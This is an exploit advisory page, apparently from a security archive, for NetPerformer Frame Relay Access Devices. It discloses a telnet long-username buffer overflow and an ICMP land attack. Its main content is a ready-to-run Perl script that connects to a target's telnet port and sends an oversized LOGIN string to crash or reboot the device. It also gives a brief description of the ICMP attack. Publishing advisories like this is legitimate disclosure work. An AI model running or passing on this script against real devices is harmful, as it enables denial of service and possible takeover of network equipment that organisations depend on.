Exploit: NetPerformer FRAD ACT Multiple Vulnerabilities ( Ascii Version )

Search:
WLB2

NetPerformer FRAD ACT Multiple Vulnerabilities

Published
Credit
Risk
2006.09.19
arif jatmoko
Medium
CWE
CVE
Local
Remote
N/A
CVE-2006-4833
CVE-2006-4832
Yes
No

Plain text version


NetPerformer Frame Relay Access Device (FRAD) ACT Multiple Vulnerabilities

.<=[ Arif Jatmoko ]=>.

Release Date : 8 July 2006

Product Affected :

- NetPerformer FRAD ACT SDM-95xx version 7.xx (R1), earlier, and
possibly newer
- NetPerformer FRAD ACT SDM-93xx version 10.x.x (R2), earlier, and
possibly newer
- NetPerformer FRAD ACT SDM-92xx version 9.x.x (R1), earlier, and
possibly newer
- ....

Web Site :
www.netperformer.com

=.[DESCRIPTION].=

NetPerformer Frame Relay Access Device (FRAD) is switching & routing device
that support Ethernet and SNA protocols, Voice, etc. This device mainly
used for connecting distributed WAN network through frame relay or ATM
network.

=.[DETAILS].=

1. Telnet long username Buffer Overflow.
Passing an overly long username (>4550 char) against telnet service causes
device to reboot. Successful remote exploitation will possibly allows an
attacker gaining access into the device.

==================================
00.^.00==================================
# __START_CODE
#
#!/usr/bin/perl

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "23",

Proto => "TCP"))
{
print "Modhiar'000 ..... killing netperformer ... $ARGV[0]
port 23...";
sleep(1);
print $socket "LOGIN " . "A" x 4550 . "BCDErn";
sleep(1);
print $socket "PASS " . "rn";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:23n";
}
# __END_CODE

==================================
00.^.00==================================

2. ICMP Land Attack
By sending specially crafted ICMP packets will causes the device to be hang
up and resetting current TCP handshake connection. In earlier version
possibly will make device to reboot.

WORKAROUND

No Workaround yet for this vulnerability.

Vendor Response Status :
Vendor response very slow since discovered the above vulnerabilities.

Arif Jatmoko //=.
Information System Security Officer
Coca-Cola Bottling Indonesia

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version